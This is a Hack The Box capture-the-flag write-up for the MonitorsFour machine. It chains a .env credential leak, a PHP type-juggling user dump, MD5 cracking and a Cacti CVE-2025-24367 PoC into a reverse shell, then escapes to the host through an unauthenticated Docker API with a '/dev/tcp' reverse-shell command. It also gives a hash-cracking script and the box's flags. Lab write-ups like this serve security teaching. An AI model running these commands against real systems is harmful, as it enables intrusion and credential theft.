HTB MonitorsFour WriteUp

Author: r0h1tAnand

Enumeration

Nikto

❯ nikto -h http://monitorsfour.htb/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.11.98
+ Target Hostname:    monitorsfour.htb
+ Target Port:        80
+ Start Time:         2026-01-02 22:50:09 (GMT5.5)
---------------------------------------------------------------------------
+ Server: nginx
+ /: Retrieved x-powered-by header: PHP/8.3.27.
+ /: The anti-clickjacking X-Frame-Options header is not present.
+ /: The X-Content-Type-Options header is not set.
+ /: Cookie PHPSESSID created without the httponly flag.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 17 error(s) and 4 item(s) reported on remote host
+ End Time:           2026-01-02 23:01:50 (GMT5.5) (701 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

RustScan

cat rustscan.txt
Open 10.10.11.98:80
Open 10.10.11.98:5985
Nmap scan report for Monitorfour.htb (10.10.11.98)
PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack ttl 127
5985/tcp open  wsman   syn-ack ttl 127

Nmap

cat nmap.txt
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-02 22:35 +0530
Nmap scan report for monitorfour.htb (10.10.11.98)
Host is up (0.16s latency).
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0

Feroxbuster

Feroxbuster turned up the login and forgot-password pages, a /user endpoint, and a large number of /static/... and admin assets.

Nuclei

Nuclei flagged /.env as a potential environment-file disclosure.

Exploitation

Retrieving .env

The .env was accessible:

❯ curl http://monitorsfour.htb/.env
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r

The file gives away MariaDB credentials for the application's backend (DB_HOST=mariadb is a service name, which already hints at a containerised deployment), and the password is worth trying elsewhere. A dotfile like this should never be reachable through the web server at all.

Subdomain discovery

A virtual-host brute force with ffuf (fuzzing the Host header against port 80) discovered cacti.monitorsfour.htb.

User enumeration API

Requesting the /user endpoint with token=0 returned every account record, including MD5-style password hashes and each user's API token. Note that three of the tokens have the form 0e followed only by digits; PHP (the backend, per the X-Powered-By header) treats such strings as numeric and compares them loosely equal to 0, which is the likely reason a token of 0 was accepted. The backend code is not shown in this write-up, so that is an inference.

❯ curl http://monitorsfour.htb/user?token=0 | jq
[
	{
		"id": 2,
		"username": "admin",
		"email": "admin@monitorsfour.htb",
		"password": "56b32eb43e6f15395f6c46c1c9e1cd36",
		"role": "super user",
		"token": "8024b78f83f102da4f",
		"name": "Marcus Higgins",
		"position": "System Administrator",
		"dob": "1978-04-26",
		"start_date": "2021-01-12",
		"salary": "320800.00"
	},
	{
		"id": 5,
		"username": "mwatson",
		"email": "mwatson@monitorsfour.htb",
		"password": "69196959c16b26ef00b77d82cf6eb169",
		"role": "user",
		"token": "0e543210987654321",
		"name": "Michael Watson",
		"position": "Website Administrator",
		"dob": "1985-02-15",
		"start_date": "2021-05-11",
		"salary": "75000.00"
	},
	{
		"id": 6,
		"username": "janderson",
		"email": "janderson@monitorsfour.htb",
		"password": "2a22dcf99190c322d974c8df5ba3256b",
		"role": "user",
		"token": "0e999999999999999",
		"name": "Jennifer Anderson",
		"position": "Network Engineer",
		"dob": "1990-07-16",
		"start_date": "2021-06-20",
		"salary": "68000.00"
	},
	{
		"id": 7,
		"username": "dthompson",
		"email": "dthompson@monitorsfour.htb",
		"password": "8d4a7e7fd08555133e056d9aacb1e519",
		"role": "user",
		"token": "0e111111111111111",
		"name": "David Thompson",
		"position": "Database Manager",
		"dob": "1982-11-23",
		"start_date": "2022-09-15",
		"salary": "83000.00"
	}
]

The admin user's hash 56b32eb43e6f15395f6c46c1c9e1cd36 is an unsalted MD5 and cracked (via CrackStation) to wonderful1. The record's real name is Marcus Higgins, which is where the Cacti username marcus used below comes from.
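As an added example (not part of the original write-up), the script below triages the dumped records the way a practitioner would before touching anything else: it emulates PHP's loose string comparison to show which tokens collapse to 0, and it runs a small offline MD5 wordlist check against the password column. The user records are copied from the response above; the wordlist, the function names and the emulation of PHP's numeric-string rule are my own assumptions, and the test of the cracker below uses a constructed hash with a known preimage rather than the box's hashes.

```python
import hashlib
import re
from typing import Optional

# Records copied from the /user?token=0 response (only the fields used here).
DUMPED_USERS = [
    {"username": "admin",     "password": "56b32eb43e6f15395f6c46c1c9e1cd36", "token": "8024b78f83f102da4f"},
    {"username": "mwatson",   "password": "69196959c16b26ef00b77d82cf6eb169", "token": "0e543210987654321"},
    {"username": "janderson", "password": "2a22dcf99190c322d974c8df5ba3256b", "token": "0e999999999999999"},
    {"username": "dthompson", "password": "8d4a7e7fd08555133e056d9aacb1e519", "token": "0e111111111111111"},
]

# Constructed wordlist for the offline check (assumption: a real run would use rockyou or similar).
WORDLIST = ["password", "admin", "wonderful1", "cacti", "monitorsfour"]

# PHP's notion of a numeric string: optional whitespace, sign, digits, fraction, exponent.
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_equals(a: str, b: str) -> bool:
    """Emulate PHP 8's `==` on two strings: if both are numeric strings they are
    compared as numbers, otherwise byte-for-byte. "0e999..." is numeric with
    value 0, so it loosely equals "0"; "8024b78f..." is not numeric, so it does not."""
    if _PHP_NUMERIC.match(a) and _PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def magic_tokens(users, supplied: str = "0"):
    """Usernames whose stored token would match `supplied` under a loose `==`."""
    return [u["username"] for u in users if php_loose_equals(u["token"], supplied)]


def crack_md5(digest: str, wordlist) -> Optional[str]:
    """Return the first wordlist entry whose unsalted MD5 equals `digest`, else None."""
    digest = digest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def triage(users, wordlist):
    """Map each username to its cracked password (or None)."""
    return {u["username"]: crack_md5(u["password"], wordlist) for u in users}


if __name__ == "__main__":
    print("tokens loosely equal to '0':", magic_tokens(DUMPED_USERS))
    for user, pw in triage(DUMPED_USERS, WORDLIST).items():
        print(f"{user}: {pw if pw else 'not in wordlist'}")
```

The fix on the application side is a strict comparison (`===`, or better `hash_equals()`) against a token that is not user-controlled in type; the fix on the storage side is a salted, slow password hash instead of bare MD5.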

Cacti (cacti.monitorsfour.htb) — RCE

The cacti subdomain hosted a vulnerable Cacti instance. A public PoC for CVE-2025-24367 was run against it; the exploit is authenticated, so it relies on the marcus:wonderful1 credentials recovered above.

Steps taken:

git clone https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC.git
cd CVE-2025-24367-Cacti-PoC
sudo python3 exploit.py -url http://cacti.monitorsfour.htb -u marcus -p wonderful1 -i 10.10.1

# Output excerpts:
[+] Cacti Instance Found!
[+] Serving HTTP on port 80
[+] Login Successful!
[+] Got graph ID: 226
[i] Created PHP filename: QIrLq.php
[+] Got payload: /bash
[i] Created PHP filename: nEB9f.php
[+] Hit timeout, looks good for shell, check your listener!
[+] Stopped HTTP server on port 80

This yielded a reverse shell as www-data inside the container running Cacti.

Privilege Escalation — User Flag

From the webshell:

www-data@821fbd6a43fa:/home/marcus$ cat user.txt
b19adbc0656973ccbc9501eff00564e9

The presence of /.dockerenv (and the container-ID style hostname 821fbd6a43fa) confirmed the shell was inside a Docker container rather than on the host.

Privilege Escalation — Root

From inside the container, the Docker daemon's TCP API was reachable at 192.168.65.7:2375 with no authentication or TLS. Anyone who can reach that port can create containers, and a container that bind-mounts a host path is as good as root on that path. Using the API directly, a new container was created and started with the host filesystem mounted and a reverse shell as its command:

# Create a container with a bind mount that exposes the host filesystem at /host_root
curl -X POST -H "Content-Type: application/json" \
	http://192.168.65.7:2375/containers/create \
	-d '{
		"Image": "docker_setup-nginx-php:latest",
		"Cmd": ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.15.179/9000 0>&1"],
		"HostConfig": {
			"Binds": ["/mnt/host/c:/host_root"]
		}
	}'

# Start the created container; <container_id> is the "Id" field of the JSON the create
# call returns. A listener on 10.10.15.179:9000 must be up before this call.
curl -X POST http://192.168.65.7:2375/containers/<container_id>/start

Starting the container triggered the reverse shell, which arrives as root inside the new container (note the new container ID in the prompt), with the Windows host's C: drive mounted at /host_root. Browsing that mount gives read and write access to the host filesystem, including the root flag on the Administrator desktop:

root@ce1622d49bf1:/home/marcus# ls -la /host_root
# (mounted Windows host filesystem)
root@ce1622d49bf1:/home/marcus# cat /host_root/Users/Administrator/Desktop/root.txt
002402adad2f66260505d18e1c907b7a

Flags

  • User flag: b19adbc0656973ccbc9501eff00564e9
  • Root flag: 002402adad2f66260505d18e1c907b7a

Notes

  • The attack chain used: .env disclosure → user enumeration → password cracking → subdomain discovery (cacti) → authenticated Cacti RCE PoC → container escape via exposed Docker API → host filesystem access → root flag.
  • A Docker daemon exposed over plain TCP without TLS client authentication is equivalent to root on the host: any client that can reach the port can start containers with arbitrary bind mounts (or --privileged) and read or modify the host filesystem at will.


Author: Sierra0117

This post is licensed under CC BY 4.0 by the author.